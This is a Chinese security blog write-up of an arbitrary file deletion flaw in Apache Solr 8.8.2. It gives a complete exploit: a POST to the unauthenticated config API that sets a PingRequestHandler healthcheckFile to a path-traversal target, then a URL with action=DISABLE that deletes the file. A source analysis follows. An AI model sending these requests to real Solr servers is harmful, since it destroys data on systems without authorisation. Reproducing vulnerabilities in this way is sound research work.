Apache Solr 任意文件删除

  • Apache Solr 任意文件删除已关闭评论
  • 10 views
  • A+

漏洞简介

Apache Solr 存在任意文件删除漏洞,在目前的最新版本(8.8.2)中仍然未被修复,漏洞的根本成因是函数 Files.deleteIfExists() 对要删除的文件名并未做校验。同时 Apache Solr Config Api 对外开放,导致任意用户可修改配置,造成危害。

漏洞复现

环境搭建,下载符合存在漏洞的 Apache Solr 版本:Apache Solr 8.8.2 ,同时下载源码文件和二进制文件,方便进行调试。

tar -zxvf solr-8.8.2.tgz
cd solr-8.8.2/bin/
./solr -c -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=18522" -p 8983  # 以 Debug 模式启动
./solr create -c test_solr  #创建一个数据驱动模式的核心

在 /tmp 目录下创建 test.txt

wKg0C2C1mumACIKrAAAcAXEFEKY825.png

向 core 的 config API 发送 POST 数据包,

```
POST /solr/test_solr/config HTTP/1.1
Host: 192.168.198.132:8983
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-type:application/json
Content-Length: 224

{
"add-requesthandler": {
  "name": "/test_solr",
  "class":"solr.PingRequestHandler",
  "defaults":{"echoParams":"explicit"},
  "healthcheckFile":"../../../../../../../../../../../../../tmp/test.txt",
}
}
```

wKg0C2C1mwCAVaETAACwn3TEis392.png

设定 healthcheckFile 为要删除的文件,如果提示路径已存在,可以利用 update-requesthandler 来设定参数

查看设定的参数是否创建成功

http://192.168.198.132:8983/solr/test_solr/config/overlay?omitHeader=true

wKg0C2C1mxuAO9ApAABLmh8qX6o317.png

http://192.168.198.132:8983/solr/test_solr/test_solr?action=DISABLE

wKg0C2C1m1CAc1RVAABB1oa4rU510.png

文件成功被删除

wKg0C2C1m2WAFpB3AABCkVQHIc877.png

漏洞分析

启动 idea 开启 调试环境

wKg0C2C1m3iAN3I8AACW9aDlBpo448.png

通过 config api 设置 healthcheckFile,Solr 提供给管理员方便管理的配置 api,属于正常功能,由于 Solr 默认安装为未授权,所以攻击者可以直接配置 config api 。(CVE-2019-17558)

wKg0C2C1m4qAV3VwAADLqIIfnU402.png

requestHandler 就是请求处理程序,定义了 solr 接收到请求后应该做什么样的操作。每类服务在 solr 中都有对应的 request handler 接收处理数据,solr 中有定义了很多内置的请求处理程序,也可以通过配置 conf/solrconfig.xml 来实现自定义的请求处理。

<requestHandler name="/query" class="solr.SearchHandler">

所以针对 Apache Solr 的漏洞,只需要通过定位到内部漏洞的位置,就可以直接通过设定 config api 直接触发

org.apache.solr.handler.PingRequestHandler#handleRequestBody

wKg0C2C1m6KAa4txAACNGtDdbf8037.png

org.apache.solr.handler.PingRequestHandler#handleEnable

wKg0C2C1m7mAc31dAAC6Oq6unAk892.png

此处用了 函数 Files.deleteIfExists() 实现对文件的删除

wKg0C2C1m8yAf1l2AAB47GxSxGk373.png

我们查看 healthcheck 值的来源

wKg0C2C1mGAVTXmAADAzAqXxpA765.png

参考文章

Apache Solr <= 8.8.2(最新)任意文件删除

相关推荐: CVE-2021-1665分析

译文声明 本文原作者Hardik Shah,原文来源https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-cve-2021-1665-remote-code-execution-vulne…